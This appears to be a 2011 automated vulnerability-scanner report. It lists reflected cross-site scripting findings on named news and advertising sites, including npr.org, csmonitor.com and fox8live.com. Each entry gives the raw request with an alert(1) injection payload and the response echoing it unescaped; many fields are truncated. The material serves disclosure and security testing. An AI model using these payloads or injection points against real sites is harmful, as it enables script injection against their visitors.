GET /servlet/ajrotator23c91<script>alert(1)< Host: w10.localadbuy.com Proxy-Connection: keep-alive Referer: http://www.fox8live.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optin=Aa; ajess1_ADC1D6F3755E8 |
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Mon, 09 May 2011 15:37:04 GMT Content-Type: text/html <H1>404 Not Found</H1> <pre>Resource /servlet/ajrotator23c91<script>alert(1)< <BR> |
Severity: | High |
Confidence: | Certain |
Host: | http://w10.localadbuy.com |
Path: | /servlet/ajrotator/551/0 |
GET /servlet2c1d1<script>alert(1)< Host: w10.localadbuy.com Proxy-Connection: keep-alive Referer: http://www.fox8live.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optin=Aa; ajess1_ADC1D6F3755E8 |
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Mon, 09 May 2011 15:39:45 GMT Content-Type: text/html <H1>404 Not Found</H1> <pre>Resource /servlet2c1d1<script>alert(1)< <BR> |
Severity: | High |
Confidence: | Certain |
Host: | http://w10.localadbuy.com |
Path: | /servlet/ajrotator/551/0 |
GET /servlet/ajrotator3a9f7<script>alert(1)< Host: w10.localadbuy.com Proxy-Connection: keep-alive Referer: http://www.fox8live.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optin=Aa; ajess1_ADC1D6F3755E8 |
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Mon, 09 May 2011 15:39:45 GMT Content-Type: text/html <H1>404 Not Found</H1> <pre>Resource /servlet/ajrotator3a9f7<script>alert(1)< <BR> |
Severity: | High |
Confidence: | Firm |
Host: | http://wvue.web.entriq |
Path: | /nw/dpm/loadplayer/ |
GET /nwa1658<a>f37537d35d2/dpm/loadplayer/ Host: wvue.web.entriq.net Proxy-Connection: keep-alive Referer: http://www.fox8live.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Mon, 09 May 2011 15:38:07 GMT Server: Apache X-Host: w3 Vary: Accept-Encoding Cache-Control: max-age=60 Expires: Mon, 09 May 2011 15:39:07 GMT Content-Type: text/html Content-Length: 674 </table> Invalid Layout File: The layout file templates/user/wvue ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://wvue.web.entriq |
Path: | /nw/dpm/loadplayer/ |
GET /nw/dpm/loadplayer/ Host: wvue.web.entriq.net Proxy-Connection: keep-alive Referer: http://www.fox8live.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:38:02 GMT Server: Apache X-Host: w12 Vary: Accept-Encoding Cache-Control: max-age=3600 Expires: Mon, 09 May 2011 16:38:02 GMT Content-Type: text/javascript Content-Length: 61867 /* Player TYPE 2 DayPort, Inc. */ DayPortPlayerCallBack { this.version = "201001251308"; this.imageDomain = "wvue.img.entriq.net"; this.domain = "wvue.web.entriq.net"; this.noCacheDomain = "wvue.web.entriq.net"; this.affiliateID ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.collegesurfing |
Path: | /searchbox-mge-us.php |
GET /searchbox-mge-us.php?id Host: www.collegesurfing.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: BIGipServerwww.colle |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:35:26 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 11482 <html xmlns="http://www.w3.org <head> <link href="/css/searchbox-mge <script src="/js/dojo/dojo/dojo </head> <body> <sc ...[SNIP]... <input type="hidden" name="id" value="1282808868879"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.csmonitor.com |
Path: | /Business |
GET /Businesse3b56"-alert(1)- Host: www.csmonitor.com Proxy-Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=02a30c0984 |
HTTP/1.1 404 Not Found Server: Apache/2.2.12 (Ubuntu) X-Powered-By: eZ Publish Pragma: no-cache Last-Modified: Mon, 09 May 2011 15:35:00 GMT Served-by: Content-Language: en-US Status: 404 Not Found Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Cache-Control: public, must-revalidate, max-age=86376 Expires: Tue, 10 May 2011 15:34:37 GMT Date: Mon, 09 May 2011 15:35:01 GMT Connection: close Content-Length: 31494 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title> Not ...[SNIP]... <script language="JavaScript" type="text/javascript"> s.pageName="/Businesse3b56"-alert(1)- var s_code=s.t();if(s_code </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.csmonitor.com |
Path: | /Business/2011/0509/Gas |
GET /Businessb75d3"-alert(1)- Host: www.csmonitor.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=02a30c0984 |
HTTP/1.1 404 Not Found Server: Apache/2.2.12 (Ubuntu) X-Powered-By: eZ Publish Pragma: no-cache Last-Modified: Mon, 09 May 2011 15:38:08 GMT Served-by: Content-Language: en-US Status: 404 Not Found Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Cache-Control: public, must-revalidate, max-age=86400 Expires: Tue, 10 May 2011 15:38:08 GMT Date: Mon, 09 May 2011 15:38:08 GMT Connection: close Content-Length: 31574 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title> Not ...[SNIP]... <script language="JavaScript" type="text/javascript"> s.pageName="/Businessb75d3"-alert(1)- var s_code=s.t();if(s_code </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.csmonitor.com |
Path: | /Business/2011/0509/Gas |
GET /Business/20114befc"-alert(1)- Host: www.csmonitor.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=02a30c0984 |
HTTP/1.1 404 Not Found Server: Apache/2.2.12 (Ubuntu) X-Powered-By: eZ Publish Pragma: no-cache Last-Modified: Mon, 09 May 2011 15:38:13 GMT Served-by: Content-Language: en-US Status: 404 Not Found Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Cache-Control: public, must-revalidate, max-age=86399 Expires: Tue, 10 May 2011 15:38:12 GMT Date: Mon, 09 May 2011 15:38:13 GMT Connection: close Content-Length: 31574 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title> Not ...[SNIP]... <script language="JavaScript" type="text/javascript"> s.pageName="/Business var s_code=s.t();if(s_code </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.csmonitor.com |
Path: | /Business/2011/0509/Gas |
GET /Business/2011/050948666"-alert(1)- Host: www.csmonitor.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=02a30c0984 |
HTTP/1.1 404 Not Found Server: Apache/2.2.12 (Ubuntu) X-Powered-By: eZ Publish Pragma: no-cache Last-Modified: Mon, 09 May 2011 15:38:17 GMT Served-by: Content-Language: en-US Status: 404 Not Found Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Cache-Control: public, must-revalidate, max-age=86397 Expires: Tue, 10 May 2011 15:38:14 GMT Date: Mon, 09 May 2011 15:38:17 GMT Connection: close Content-Length: 31574 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title> Not ...[SNIP]... <script language="JavaScript" type="text/javascript"> s.pageName="/Business var s_code=s.t();if(s_code </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.csmonitor.com |
Path: | /Business/2011/0509/Gas |
GET /Business/2011/0509/Gas Host: www.csmonitor.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=02a30c0984 |
HTTP/1.1 404 Not Found Server: Apache/2.2.12 (Ubuntu) X-Powered-By: eZ Publish Pragma: no-cache Last-Modified: Mon, 09 May 2011 15:38:22 GMT Served-by: Content-Language: en-US Status: 404 Not Found Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Cache-Control: public, must-revalidate, max-age=86400 Expires: Tue, 10 May 2011 15:38:22 GMT Date: Mon, 09 May 2011 15:38:22 GMT Connection: close Content-Length: 31574 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title> Not ...[SNIP]... <script language="JavaScript" type="text/javascript"> s.pageName="/Business var s_code=s.t();if(s_code </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.fox8live.com |
Path: | /widgets/serve.aspx |
GET /widgets/serve.aspx?wid Host: www.fox8live.com Proxy-Connection: keep-alive Referer: http://www.fox8live.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-44190619 |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:40:06 GMT Server: PWS/1.7.2.1 X-Px: ms iad-agg-n30 ( iad-agg-n27), ms iad-agg-n27 ( origin) Cache-Control: max-age=121 Expires: Mon, 09 May 2011 15:42:07 GMT Age: 0 Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Px-Uncompress-Origin: 9234 Connection: keep-alive Content-Length: 9234 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_ctl00_Head1"> ...[SNIP]... ) && (IDMUtilsJS_Loaded)) { Goto(searchval); } } function Goto(searchval) { var sFormat = 'click.ashx?type=business var sSubmitTarget = String.format(sFormat, searchval); window.open(sSubmitTarget } </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.macroaxis.com |
Path: | /widgets/url.jsp |
GET /widgets/url.jsp?t=26&s Host: www.macroaxis.com Proxy-Connection: keep-alive Referer: http://www.hnedata.net User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:38:08 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.28 Set-Cookie: JSESSIONID=6B4341DCE Content-Length: 2480 Content-Type: text/html;charset=ISO function iecheck() { if (navigator.platform == "Win32" && navigator.appName == "Microsoft Internet Explorer" && window.attachEvent) { var rslt = navigator.appVersion ...[SNIP]... y_frame' marginheight='0' marginwidth='0' SCROLLING='NO' height='174px' width='100%' frameborder='0' src='http://widgets ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.macroaxis.com |
Path: | /widgets/url.jsp |
GET /widgets/url.jsp?t=26&s Host: www.macroaxis.com Proxy-Connection: keep-alive Referer: http://www.hnedata.net User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:38:04 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.28 Set-Cookie: JSESSIONID=86336010B Content-Length: 2477 Content-Type: text/html;charset=ISO function iecheck() { if (navigator.platform == "Win32" && navigator.appName == "Microsoft Internet Explorer" && window.attachEvent) { var rslt = navigator.appVersion ...[SNIP]... ay_frame' marginheight='0' marginwidth='0' SCROLLING='NO' height='174px' width='100%' frameborder='0' src='http://widgets ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.macroaxis.com |
Path: | /widgets/url.jsp |
GET /widgets/url.jsp?t=266fb33'%3balert(1)/ Host: www.macroaxis.com Proxy-Connection: keep-alive Referer: http://www.hnedata.net User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:37:59 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.28 Set-Cookie: JSESSIONID=5933FD8D8 Content-Length: 2071 Content-Type: text/html;charset=ISO function iecheck() { if (navigator.platform == "Win32" && navigator.appName == "Microsoft Internet Explorer" && window.attachEvent) { var rslt = navigator.appVersion ...[SNIP]... ; document.lastChild } function requestContent( local ) { var script = document.createElement( script.src = CONTENT_URL + '?t=266fb33';alert(1)/ document.getElements } this.init = function() { this.serverResponse = function(data) { if (!d ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.npr.org |
Path: | /templates/reg/forgot |
GET /templates/reg/forgot Host: www.npr.org Proxy-Connection: keep-alive Referer: http://www.npr.org Cache-Control: max-age=0 Origin: http://www.npr.org User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: rosi=75c427ffc47b22e |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:40:54 GMT Server: Apache X-Powered-By: PHP/5.2.9 Cache-Control: max-age=0 Expires: Mon, 09 May 2011 15:40:54 GMT Content-Type: text/html Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 12982 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <strong>933d3<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.therepublic |
Path: | /assets/gzip.php |
GET /assets/gzip.php?cache Host: www.therepublic.com Proxy-Connection: keep-alive Referer: http://www.therepublic User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=091f1945bf |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:37:15 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.17 Expires: Thu, 12 May 2011 15:37:39 GMT Content-Type: text/javascript; charset: UTF-8 Content-Length: 145899 // FILE NOT FOUND 'scripts/jquery/js/jquery alert(1)//706f6bd3266' (function ($) { $.fn.fadeTransition = function(options) { var options = $.extend({pauseTime: 5000, transitionTime: 2000}, options); Trans = function(obj) { var timer = null; ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.therepublic |
Path: | /assets/gzip.php |
GET /assets/gzip.php?cache Host: www.therepublic.com Proxy-Connection: keep-alive Referer: http://www.therepublic User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=091f1945bf |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:37:10 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.17 Expires: Thu, 12 May 2011 15:37:34 GMT Content-Type: text/css; charset: UTF-8 Content-Length: 19325 // FILE NOT FOUND 'scripts/jquery/css div#menu{height:41px div#menu ul{margin:0;padding:0 div#menu ul.menu{padding ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.therepublic |
Path: | /assets/gzip.php |
GET /assets/gzip.php?cache Host: www.therepublic.com Proxy-Connection: keep-alive Referer: http://www.therepublic User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=091f1945bf |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:37:16 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.17 Expires: Thu, 12 May 2011 15:37:40 GMT Content-Type: text/javascript; charset: UTF-8 Content-Length: 202184 /* * jQuery JavaScript Library v1.3.2 * http://jquery.com/ * * Copyright (c) 2009 John Resig * Dual licensed under the MIT and GPL licenses. * http://docs.jquery.com * * Date: 2009-02- ...[SNIP]... "offset"+G],document /* * jQuery UI 1.7.2 * * Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com * Dual licensed under the MIT (MIT-LICENSE.txt) * and GPL (GPL-LICENSE.txt) licenses. * * http://docs.jquer ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.therepublic |
Path: | /assets/gzip.php |
GET /assets/gzip.php?cache Host: www.therepublic.com Proxy-Connection: keep-alive Referer: http://www.therepublic User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=091f1945bf |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:37:12 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.17 Expires: Thu, 12 May 2011 15:37:36 GMT Content-Type: text/css; charset: UTF-8 Content-Length: 39249 .ui-helper-hidden{display .ui-helper-hidden .ui-helper-reset{margin:0 ...[SNIP]... ted a{cursor:pointer;} .ui-tabs .ui-tabs-panel{padding .ui-tabs .ui-tabs-hide{display // FILE NOT FOUND 'scripts/menu/menu.css31990<img src=a onerror=alert(1) body{margin-top:0px ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.therepublic |
Path: | /assets/gzip.php |
GET /assets/gzip.php?cache Host: www.therepublic.com Proxy-Connection: keep-alive Referer: http://www.therepublic User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=091f1945bf |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:37:13 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.17 Expires: Thu, 12 May 2011 15:37:37 GMT Content-Type: text/css; charset: UTF-8 Content-Length: 24933 .ui-helper-hidden{display .ui-helper-hidden .ui-helper-reset{margin:0 ...[SNIP]... /menu/images/lava.png) no-repeat top left !important;background // FILE NOT FOUND 'css/style.csse3a85<img src=a onerror=alert(1) |
Severity: | High |
Confidence: | Certain |
Host: | http://www.therepublic |
Path: | /assets/gzip.php |
GET /assets/gzip.php?cache Host: www.therepublic.com Proxy-Connection: keep-alive Referer: http://www.therepublic User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=091f1945bf |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:37:16 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.17 Expires: Thu, 12 May 2011 15:37:40 GMT Content-Type: text/javascript; charset: UTF-8 Content-Length: 71404 /* * jQuery JavaScript Library v1.3.2 * http://jquery.com/ * * Copyright (c) 2009 John Resig * Dual licensed under the MIT and GPL licenses. * http://docs.jquery.com * * Date: 2009-02- ...[SNIP]... seTime); }; cue(); } return this.each(function() { var t = new Trans(this); }); } })(jQuery); // FILE NOT FOUND 'scripts/jquery/js/jquery /** jquery.color.js ****************/ /* * jQuery Color Animations * Copyright 2007 John Resig * Released under the MIT and GPL licenses. */ (function(jQuery){ // We override the animation fo ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.therepublic |
Path: | /assets/gzip.php |
GET /assets/gzip.php?cache Host: www.therepublic.com Proxy-Connection: keep-alive Referer: http://www.therepublic User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=091f1945bf |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:37:17 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.17 Expires: Thu, 12 May 2011 15:37:41 GMT Content-Type: text/javascript; charset: UTF-8 Content-Length: 190058 /* * jQuery JavaScript Library v1.3.2 * http://jquery.com/ * * Copyright (c) 2009 John Resig * Dual licensed under the MIT and GPL licenses. * http://docs.jquery.com * * Date: 2009-02- ...[SNIP]... ects.restore(e,d);if(h== alert(1)//a9a972eae26' |
Severity: | High |
Confidence: | Certain |
Host: | http://www.therepublic |
Path: | /assets/gzip.php |
GET /assets/gzip.php?cache Host: www.therepublic.com Proxy-Connection: keep-alive Referer: http://www.therepublic User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=091f1945bf |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:37:18 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.17 Expires: Thu, 12 May 2011 15:37:42 GMT Content-Type: text/javascript; charset: UTF-8 Content-Length: 190059 /* * jQuery JavaScript Library v1.3.2 * http://jquery.com/ * * Copyright (c) 2009 John Resig * Dual licensed under the MIT and GPL licenses. * http://docs.jquery.com * * Date: 2009-02- ...[SNIP]... effects.restore(e,d);if(h alert(1)//b26abd85278u.js' |
Severity: | High |
Confidence: | Certain |
Host: | http://www.therepublic |
Path: | /assets/gzip.php |
GET /assets/gzip.php?cache Host: www.therepublic.com Proxy-Connection: keep-alive Referer: http://www.therepublic User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=091f1945bf |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:37:14 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.17 Expires: Thu, 12 May 2011 15:37:38 GMT Content-Type: text/css; charset: UTF-8 Content-Length: 24934 .ui-helper-hidden{display .ui-helper-hidden .ui-helper-reset{margin:0 ...[SNIP]... pts/menu/images/lava.png) no-repeat top left !important;background // FILE NOT FOUND 'css/style/9454e<img src=a onerror=alert(1) |
Severity: | Low |
Confidence: | Certain |
Host: | http://fw.adsafeprotected |
Path: | /rjss/bs.serving-sys.com |
